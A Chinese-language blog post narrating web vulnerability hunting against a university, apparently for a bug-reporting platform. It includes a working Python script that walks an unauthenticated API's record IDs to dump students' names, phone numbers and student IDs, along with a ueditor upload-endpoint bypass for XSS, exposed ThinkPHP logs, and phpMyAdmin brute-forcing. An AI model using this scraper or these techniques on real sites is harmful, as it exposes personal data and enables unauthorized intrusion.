原创|记一次高校漏洞挖掘

前言:逐渐我发觉，写博客没有意义，会的人不看，不会的人看不懂 ，而且这东西不给钱，既然这样质量很重要吗？

最近几天，单纯想挖挖某个学校，原因很简单，单纯看不惯管理，，，，打了两天点，shell没拿到，挖到一堆接口和

敏感信息泄露。想谈一下挖掘站点的时候弱口令和接口的重要性。

成果:

1.某备案站点接口未授权全校师生信息泄露

2.某站TP框架全站日志泄露

一些能打组合拳的地方:

1.某站403站点下的二级目录phpmyadmin 版本4.8.1

2.tp框架有后台登录

3.403站点下的fck编辑器

========================================

0x01. 备案站点未授权接口

​ 资产发现： 浏览网站发现有个点击报修，然后就跳到站点，拿去whios识别了，确定是信息收集漏掉的资产，

然后业务就只有一处报修信息，而且很奇怪的有***，如图

我的第一想法是fuzz这个电话号码，直接f12，看到点击查看订单弹窗后方法栈请求了home/repair这个地方

跟进这个524行，是一个ajax的请求接口，看到数据的带*是js处理，也就是前段验证，这里直接访问接口

​

遍历repId的值得到完整数据，

然后，觉得直接交的话，给不了多少分，，，花一下午写了个脚本，没错，这25行代码，写了一下午，菜的找个班上算了

import requests,json
from lxml import etree
for i in range(8104,9907):	
	url="http://www.xxxx.com/xxx/xxxx=31{}".format(i)
	response=requests.get(url).content.decode('utf-8')
	data=etree.HTML(response)
	print(etree.tostring(data,encoding='utf-8').decode('utf-8'))
	name=data.xpath('/html/body/p/text()')
	b=str(name)
	print(b)
	if len(b)<30:
    	pass
	else:
   		 number=b.split('"RepTel":')[1].split(',"RepTelOther"')[0]
   		 name=b.split('"Rep_UserRealName":')[1].split(',"Rep_OrderNo"')[0]
    	 xuehao=b.split('"Rep_UserName":')[1].split(',"Rep_UserRealName"')[0]
   		 print(name,number,xuehao)

   		 dists={}
   		 dists['number']=number
   		 dists['name']=name
   		 dists['xuehao']=xuehao

   		 with open('a.json','a',encoding="utf-8") as f:
       		 f.write(json.dumps(dists, ensure_ascii=False))

因为数据有3w多条，只遍历3k证明危害足够了，json看上去效果还是不错的

然后，挖掘了某弱口令，大概有20来个统一账号，这里没啥说的，

0x02. 接口x2

很多时候，我们访问网站一些资源，会被服务器策略限制，比如返回403,这时候往往测不下去了，但接口有时候能绕过限制，这两天也挖了很多ueditor的漏洞，比较典型的，某高校211清华大学的ueditor

正常测ueditor文件上传会怎么测？

访问 http://xxx/ueditor 如果demo页面存在，那么通过ueditor插件上传，但大多数服务器会对demo目录做限制，那么，就不能上传了吗？

直接请求上传接口，直接bypass，ueditor/php/controller.php?action=uploadfile

构造POST需要的参数，这里很简单，只需要从别的站套个模板即可

弹xss

谷歌语法收集ueditor : site: xxxxx upload 直接看upload就行。

0x03.某Tp框架全局日志泄露

由于是外网打点，没有弱口令，挖到很多可以打组合拳的地方没办法直接利用，但不是说，这代表信息收集这些内容没有用处

某站前台日志和后台日志 /logs/admin 以及/logs/home 目录 缺了点运气，3.2.3的框架，但并没记录登录密码

于是乎找到另一处，这些tp框架搜集，可以看指纹 x-ff头 thinkphp

这一处报错了，5.0.24，但直接用poc打，出现问题，我觉得是路径不对，，但手打欠了点经验

于是乎，在ip出口cc段，又找打一处，这处的资产比较隐蔽，可以看到服务器搭建为wamp

这些都是同个ip出口旁站，只要拿下一个shell，其他的都等于拿下，，但不会打，接着继续收集

收集到一处403的二级目录phpmyadmin

爆破1个小时，不存在弱口令，，但cnvd有人交sql注入，但poc会发吗？

绕过了后台有任意文件读取，也可以达到getshell的目录，，总的来说，，外网打点还是差了个弱口令，毕竟弱口令是0day嘛